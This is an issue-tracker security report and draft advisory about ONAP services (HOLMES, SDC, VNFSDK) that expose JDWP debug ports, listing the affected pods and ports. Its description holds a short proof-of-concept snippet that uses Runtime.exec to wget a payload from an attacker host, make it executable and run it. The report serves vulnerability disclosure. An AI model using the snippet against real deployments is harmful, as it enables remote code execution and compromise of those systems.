Details
-
Epic
-
Status: Confirmed
-
High
-
Resolution: Unresolved
-
None
-
JDWP exposure
Description
JDWP protocol exposed outside of pod allows for arbitrary code execution
using below snipet:
print new java.lang.Runtime().exec("wget http://<attackerip>/payload")
print new java.lang.Runtime().exec("chmod +x payload")
print new java.lang.Runtime().exec("./payload")
Impact description (draft)
Title: Some ONAP services exposes JDWP outside of pod which allows for arbitrary code execution
Reporter: Radosław Żeszczuk from Samsung
Products: HOLMES, SDC, VNFSDK
Affects: Dublin and earlier, Casablanca and earlier (depending on a product)
Description:
Radosław Żeszczuk from Samsung reported number of vulnerabilities in HOLMES, SDC, VNFSDK. By accessing ports:
- 9202 of dep-holmes-engine-mgmt pod (before Dublin)
- 4000 of demo-sdc-sdc-be pod
- 6000 of demo-sdc-sdc-fe pod
- 4001 of demo-sdc-sdc-onboarding-be pod
- 7001 of demo-sdc-sdc-wfd-be pod
- 7000 of demo-sdc-sdc-wfd-fe pod
- 8000 of demo-vnfsdk-vnfsdk
an unauthenticated attacker who already has access to pod to pod communication may execute arbitrary code inside those pods. All OOM ONAP setups are affected.